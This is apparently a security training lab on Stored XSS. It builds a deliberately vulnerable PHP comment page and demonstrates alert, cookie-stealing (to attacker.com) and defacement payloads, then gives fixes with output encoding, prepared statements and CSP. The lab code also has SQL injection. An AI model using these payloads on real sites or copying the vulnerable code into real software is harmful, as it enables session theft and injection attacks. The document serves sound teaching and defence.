Objective
Learn how to exploit Stored Cross-Site Scripting (XSS) vulnerabilities by injecting malicious scripts that execute when other users view the affected page.
Scenario
You are performing a security assessment on a community blog website that allows users to post comments under articles. Due to poor input validation, the comment section is vulnerable to Stored XSS, allowing attackers to inject malicious scripts. Your goal is to exploit this vulnerability and understand its potential impact.
Lab Setup
Prerequisites:
- Basic knowledge of HTML, PHP (or any backend language), and JavaScript.
- XAMPP/LAMP/WAMP stack installed (or any web server with PHP and MySQL support).
- A code editor (e.g., VSCode, Sublime Text).
Step 1: Create the Vulnerable Web Application
Database Setup
Open phpMyAdmin and create a new database:
CREATE DATABASE xss_lab;
Use the database:
USE xss_lab;
Create a comments table:
CREATE TABLE comments (
id INT AUTO_INCREMENT PRIMARY KEY,
username VARCHAR(50) NOT NULL,
comment TEXT NOT NULL
);
PHP Script for Comment System
Create a file comments.php:
<?php
// Deliberately vulnerable lab code: do not deploy outside the lab.
$conn = mysqli_connect("localhost", "root", "", "xss_lab");
if (isset($_POST['submit'])) {
$username = $_POST['username'];
$comment = $_POST['comment'];
// User input is concatenated straight into the SQL string (no prepared statement).
$query = "INSERT INTO comments (username, comment) VALUES ('$username', '$comment')";
mysqli_query($conn, $query);
}
$result = mysqli_query($conn, "SELECT * FROM comments");
?>
<form method="POST" action="">
Username: <input type="text" name="username" required><br>
Comment: <textarea name="comment" required></textarea><br>
<button type="submit" name="submit">Post Comment</button>
</form>
<h2>Comments:</h2>
<?php while ($row = mysqli_fetch_assoc($result)) { ?>
<!-- Stored values are echoed into the page without output encoding: this is the Stored XSS sink. -->
<p><strong><?php echo $row['username']; ?>:</strong> <?php echo $row['comment']; ?></p>
<?php } ?>
Running the Application
Start your Apache and MySQL servers.
Place comments.php in the web server’s root directory (htdocs for XAMPP).
Open http://localhost/comments.php in your browser.
Exploitation Steps
Step 1: Injecting the XSS Payload
In the Username field, enter:
Attacker
In the Comment field, enter the payload:
<script>alert('XSS');</script>
Click Post Comment.
Expected Result:
- When the page reloads, or when any other user visits the comments page, an alert box with the message 'XSS' will appear.
Step 2: Understanding the Impact
Session Hijacking: An attacker could steal session cookies with:
<script>document.location='http://attacker.com/steal.php?cookie='+document.cookie;</script>
Defacement: An attacker could modify the page’s appearance with:
<script>document.body.innerHTML='<h1>Hacked by Attacker!</h1>';</script>
Malware Injection: Inject scripts that download malicious files.
Solution and Prevention
Problem Analysis
- User input is stored as-is and later echoed back into the HTML page without output encoding, so any markup a user submits is interpreted by every visitor’s browser.
Fixing the Vulnerability
Use HTML escaping at the point of output so that characters with meaning in HTML (<, >, &, quotes) are rendered as text rather than markup. Both user-controlled fields must be encoded, not only the comment:
<?php echo htmlspecialchars($row['username'], ENT_QUOTES, 'UTF-8'); ?>
<?php echo htmlspecialchars($row['comment'], ENT_QUOTES, 'UTF-8'); ?>
In addition, a Content Security Policy (CSP) can restrict which scripts the browser is allowed to execute; it is a second layer of defence, not a replacement for output encoding.
Implementing Prepared Statements
While XSS primarily exploits output handling, it’s good practice to also secure database inputs:
$stmt = $conn->prepare("INSERT INTO comments (username, comment) VALUES (?, ?)");
$stmt->bind_param("ss", $username, $comment);
$stmt->execute();
Additional Protections
Input Validation: Restrict each field to the characters and length it actually needs (for example, an alphanumeric username with a maximum length). This limits abuse but does not by itself prevent XSS; output encoding remains the primary fix.
Content Security Policy (CSP): Add HTTP headers to restrict script sources.
Content-Security-Policy: default-src 'self'; script-src 'self';
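The three fixes above (output encoding, prepared statements and a CSP header) combined into one hardened version of the lab’s comments.php. This is an added example written for this page, not the original lab code; it assumes the same xss_lab database, comments table and XAMPP root credentials used in the lab setup, and the helper name esc_html is our own.

```php
<?php
// Added example: hardened comments.php (not the original lab file).
// Assumes the lab's xss_lab database and comments table on a local XAMPP install.
declare(strict_types=1);

// 1. Defence in depth: a CSP that only allows scripts from this origin.
//    Sent before any output. An injected inline <script> is refused by the
//    browser even if an encoding call were ever missed.
header("Content-Security-Policy: default-src 'self'; script-src 'self';");

// 2. Make mysqli throw on errors instead of failing silently.
mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);
$conn = mysqli_connect("localhost", "root", "", "xss_lab");
$conn->set_charset("utf8mb4");

// Output-encoding helper for an HTML text context (helper name is ours).
// ENT_QUOTES also encodes ' and " so the value is safe inside attributes.
function esc_html(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

$error = '';
if (isset($_POST['submit'])) {
    $username = trim((string)($_POST['username'] ?? ''));
    $comment  = trim((string)($_POST['comment'] ?? ''));

    // 3. Input validation: an allow-list for the username and length limits.
    //    This is a secondary control; the XSS fix is the encoding at output.
    $valid = preg_match('/^[A-Za-z0-9_]{1,50}$/', $username) === 1
          && $comment !== '' && mb_strlen($comment) <= 2000;

    if ($valid) {
        // 4. Prepared statement: user input never becomes part of the SQL text.
        $stmt = $conn->prepare("INSERT INTO comments (username, comment) VALUES (?, ?)");
        $stmt->bind_param("ss", $username, $comment);
        $stmt->execute();
        $stmt->close();
        // Redirect after POST so a browser refresh does not resubmit the form.
        header("Location: comments.php", true, 303);
        exit;
    }
    $error = "Username must be 1-50 letters, digits or underscores; "
           . "comment must be 1-2000 characters.";
}

$result = $conn->query("SELECT username, comment FROM comments ORDER BY id");
?>
<!DOCTYPE html>
<meta charset="utf-8">
<form method="POST" action="">
Username: <input type="text" name="username" maxlength="50" required><br>
Comment: <textarea name="comment" maxlength="2000" required></textarea><br>
<button type="submit" name="submit">Post Comment</button>
</form>
<?php if ($error !== '') { ?>
<p><?php echo esc_html($error); ?></p>
<?php } ?>
<h2>Comments:</h2>
<?php while ($row = $result->fetch_assoc()) { ?>
<!-- 5. Every user-controlled value is encoded at the point of output, so
        <script>alert('XSS')</script> is displayed as text, not executed. -->
<p><strong><?php echo esc_html($row['username']); ?>:</strong> <?php echo esc_html($row['comment']); ?></p>
<?php } ?>
```

Drop this file into htdocs alongside the vulnerable version and repeat the lab payload: the comment list shows the literal text &lt;script&gt; rather than an alert, and the browser console reports a CSP violation if any inline script does reach the page. The username is encoded as well, since a username field left unencoded would be a second stored-XSS sink.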
Testing After Fix
- Try injecting <script>alert('XSS')</script> after implementing htmlspecialchars.
- Observe that the payload is rendered as plain text instead of executing.
Conclusion
In this lab, you exploited a Stored XSS vulnerability to inject malicious scripts that execute when other users view the affected page. You also explored the serious impacts of stored XSS, such as session hijacking and defacement, and learned mitigation techniques like output encoding, input validation, and implementing security headers.